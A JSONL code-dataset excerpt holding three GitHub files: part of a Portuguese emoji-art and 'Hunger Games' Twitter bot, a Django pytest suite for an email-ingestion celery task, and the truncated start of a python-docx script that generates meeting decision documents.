tweetarXmin(statusText, 15 * contador)\r\n else:\r\n esperar(15 * contador)\r\n # endregion\r\n\r\n dia += 1\r\n\r\n #region 1 sobreviveu\r\n vencedor = participantesVivosLista[0]\r\n statusText = f'''\r\nDepois de muita luta, fuga, camuflagem e esperteza\r\nquem sobreviveu foi @{vencedor}\r\n\r\nParabéns, merecidamente\r\n\r\nSigam a página para mais eventos, Fav+RT = Humilde :]\r\n'''\r\n tweetarXmin(statusText, 0)\r\n #endregion\r\n\r\n\r\n\r\ndef tweetToTwitter():\r\n while True:\r\n #emotesUsar = list(random.sample(todosEmotes, random.randint(1, 4)))\r\n\r\n #qlPostar = 2\r\n qlPostar = random.randint(0, QTDEVENTOS - 1)\r\n # DNA Random\r\n if(qlPostar == 0):\r\n emotesUsar = list(random.sample(todosEmotes, random.randint(1, 4)))\r\n statusText = f'''{frases[random.randint(0, len(frases)-1)]}\r\n{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜⬜⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}\r\n⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜\r\n⬜⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜⬜\r\n⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜\r\n{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜⬜⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}\r\n{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜⬜⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}\r\n⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜\r\n⬜⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜⬜\r\n⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜\r\n{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜⬜⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}\r\n{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜⬜⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}\r\n⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜\r\n⬜⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜⬜\r\n⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜\r\n{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜⬜⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}\r\n{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜⬜⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}\r\n⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜\r\n⬜⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜⬜\r\n⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜\r\n{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜⬜⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}\r\n'''\r\n # DNA 2 emojis\r\n elif (qlPostar == 1):\r\n emotesUsar = list(random.sample(todosEmotes, 2))\r\n statusText = f'''{frases[random.randint(0, len(frases) - 1)]}\r\n{emotesUsar[0]}⬜⬜⬜{emotesUsar[1]}\r\n⬜{emotesUsar[0]}⬜{emotesUsar[1]}⬜\r\n⬜⬜{emotesUsar[0]}⬜⬜\r\n⬜{emotesUsar[1]}⬜{emotesUsar[0]}⬜\r\n{emotesUsar[1]}⬜⬜⬜{emotesUsar[0]}\r\n{emotesUsar[1]}⬜⬜⬜{emotesUsar[0]}\r\n⬜{emotesUsar[1]}⬜{emotesUsar[0]}⬜\r\n⬜⬜{emotesUsar[1]}⬜⬜\r\n⬜{emotesUsar[0]}⬜{emotesUsar[1]}⬜\r\n{emotesUsar[0]}⬜⬜⬜{emotesUsar[1]}\r\n{emotesUsar[0]}⬜⬜⬜{emotesUsar[1]}\r\n⬜{emotesUsar[0]}⬜{emotesUsar[1]}⬜\r\n⬜⬜{emotesUsar[0]}⬜⬜\r\n⬜{emotesUsar[1]}⬜{emotesUsar[0]}⬜\r\n{emotesUsar[1]}⬜⬜⬜{emotesUsar[0]}\r\n{emotesUsar[1]}⬜⬜⬜{emotesUsar[0]}\r\n⬜{emotesUsar[1]}⬜{emotesUsar[0]}⬜\r\n⬜⬜{emotesUsar[1]}⬜⬜\r\n⬜{emotesUsar[0]}⬜{emotesUsar[1]}⬜\r\n{emotesUsar[0]}⬜⬜⬜{emotesUsar[1]}\r\n '''\r\n # Guerra de emoji\r\n elif (qlPostar == 2):\r\n emotesUsar = list(random.sample(todosEmotes, 3))\r\n statusText = f'''\r\n QUEM GANHA??\r\n RT | FAV\r\n{emotesUsar[0]}⬜⬜⬜🆚⬜⬜⬜{emotesUsar[2]}\r\n⬜{emotesUsar[0]}⬜⬜🆚{emotesUsar[2]}⬜⬜⬜\r\n⬜⬜{emotesUsar[0]}⬜🆚⬜⬜{emotesUsar[2]}⬜\r\n{emotesUsar[0]}⬜⬜⬜🆚{emotesUsar[2]}⬜⬜⬜\r\n⬜⬜⬜⬜🆚⬜{emotesUsar[2]}⬜⬜\r\n⬜⬜{emotesUsar[0]}⬜🆚⬜{emotesUsar[2]}⬜⬜\r\n⬜{emotesUsar[0]}⬜⬜🆚⬜⬜⬜⬜\r\n⬜⬜⬜{emotesUsar[0]}🆚⬜⬜{emotesUsar[2]}⬜\r\n⬜{emotesUsar[0]}⬜⬜🆚⬜{emotesUsar[2]}⬜⬜\r\n⬜⬜⬜{emotesUsar[0]}🆚⬜⬜{emotesUsar[2]}⬜\r\n⬜{emotesUsar[0]}⬜⬜🆚{emotesUsar[2]}⬜⬜⬜\r\n'''\r\n\r\n print('\\nTweetando:')\r\n print(statusText)\r\n resp = input(\"Publicar?(S/N)\\n\")\r\n if(resp == \"S\" or resp == \"s\"):\r\n api.update_status(status=statusText)\r\n break\r\n resp = input(\"Gerar outro?(S/N)\\n\")\r\n if (resp == \"N\" or resp == \"n\"):\r\n break\r\n\r\n\r\ndef main():\r\n print('Bom dia')\r\n for categoria in emojis.db.get_categories():\r\n #print(categoria)\r\n for emote in emojis.db.get_emojis_by_category(categoria):\r\n #print(emote[1])\r\n if(len(emote[1]) == 1):\r\n todosEmotes.append(emote[1])\r\n #print(todosEmotes)\r\n resp = input('''\r\n Escolha uma opção:\r\n 1 - Tweetar\r\n 2 - Rodar HG\r\n S - sair\r\n ''')\r\n if(resp == \"1\"):\r\n tweetToTwitter()\r\n elif (resp == \"2\"):\r\n hungerGamesEvent()\r\n else:\r\n print('flw enton')\r\nif __name__ == \"__main__\":\r\n hungerGamesEvent()\r\n #main()","repo_name":"gabrielhbcs/emojiCreatorBot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":27678,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"39330165340","text":"from unittest import mock\n\nimport pytest\nfrom django.test.utils import override_settings\n\nfrom datahub.email_ingestion.mailbox import MailboxHandler\nfrom datahub.email_ingestion.tasks import ingest_emails\nfrom datahub.email_ingestion.test.utils import MAILBOXES_SETTING, mock_import_string\nfrom datahub.feature_flag.models import FeatureFlag\nfrom datahub.feature_flag.test.factories import FeatureFlagFactory\nfrom datahub.interaction import INTERACTION_EMAIL_INGESTION_FEATURE_FLAG_NAME\n\n\n@pytest.fixture()\ndef interaction_email_ingestion_feature_flag():\n \"\"\"\n Creates the email ingestion feature flag.\n \"\"\"\n yield FeatureFlagFactory(code=INTERACTION_EMAIL_INGESTION_FEATURE_FLAG_NAME)\n\n\n@pytest.mark.django_db\n@pytest.mark.usefixtures('interaction_email_ingestion_feature_flag')\nclass TestIngestEmails:\n \"\"\"\n Test ingest_emails celery task.\n \"\"\"\n\n @override_settings(MAILBOXES=MAILBOXES_SETTING)\n def test_ingest_emails_lock_acquired(self, monkeypatch):\n \"\"\"\n Test that our mailboxes are processed when the lock is acquired.\n \"\"\"\n # Mock import_string to avoid import errors for processor_class path strings\n mock_import_string(monkeypatch)\n process_new_mail_patch = mock.Mock()\n # ensure that the process_new_mail method is a mock so we can interrogate later\n monkeypatch.setattr(\n 'datahub.email_ingestion.mailbox.Mailbox.process_new_mail',\n process_new_mail_patch,\n )\n # Refresh the mailbox_handler singleton as we have overidden the MAILBOXES setting\n mailbox_handler = MailboxHandler()\n mailbox_handler.initialise_mailboxes()\n monkeypatch.setattr(\n 'datahub.email_ingestion.tasks.mailbox_handler',\n mailbox_handler,\n )\n ingest_emails()\n assert process_new_mail_patch.call_count == 2\n\n @override_settings(MAILBOXES=MAILBOXES_SETTING)\n def test_ingest_emails_lock_not_acquired(self, monkeypatch):\n \"\"\"\n Test that our mailboxes are not processed when the lock cannot be acquired successfully.\n \"\"\"\n process_new_mail_patch = mock.Mock()\n # ensure that the process_new_mail method is a mock so we can interrogate later\n monkeypatch.setattr(\n 'datahub.email_ingestion.mailbox.Mailbox.process_new_mail',\n process_new_mail_patch,\n )\n # Have to mock rather than acquire the lock as locks are per connection (if the lock is\n # already held by the current connection, the current connection can still re-acquire it).\n advisory_lock_mock = mock.MagicMock()\n advisory_lock_mock.return_value.__enter__.return_value = False\n monkeypatch.setattr('datahub.email_ingestion.tasks.advisory_lock', advisory_lock_mock)\n\n ingest_emails()\n assert process_new_mail_patch.called is False\n\n @override_settings(MAILBOXES=MAILBOXES_SETTING)\n def test_ingest_feature_flag_inactive(self, monkeypatch):\n \"\"\"\n Test that our mailboxes are not processed when the feature flag is not active.\n \"\"\"\n process_new_mail_patch = mock.Mock()\n # ensure that the process_new_mail method is a mock so we can interrogate later\n monkeypatch.setattr(\n 'datahub.email_ingestion.mailbox.Mailbox.process_new_mail',\n process_new_mail_patch,\n )\n flag = FeatureFlag.objects.get(code=INTERACTION_EMAIL_INGESTION_FEATURE_FLAG_NAME)\n flag.is_active = False\n flag.save()\n\n ingest_emails()\n assert process_new_mail_patch.called is False\n","repo_name":"uktrade/data-hub-api-actions-test","sub_path":"datahub/email_ingestion/test/test_tasks.py","file_name":"test_tasks.py","file_ext":"py","file_size_in_byte":3604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"22604732728","text":"import docx\nimport time as t\nfrom docx.shared import Pt, Mm\nfrom docx.enum.text import WD_PARAGRAPH_ALIGNMENT, WD_LINE_SPACING\n\n\ndef create_decision(name, type, date_time, form, questions, zaoch_list, protocol_date, current_date):\n new_form = form.replace('ой', 'ого')\n type = type.replace('ое', 'ого')\n total_ochno = questions[0].yes + questions[0].no + questions[0].idk\n total_zaochno = zaoch_list[0][0]+zaoch_list[0][1]+zaoch_list[0][2]\n\n if (total_ochno + total_zaochno) > 0.5*49:\n quorum = 'да'\n else:\n quorum = 'нет'\n\n doc = docx.Document(name)\n for para in doc.paragraphs:\n text = para.text\n text = text.replace('<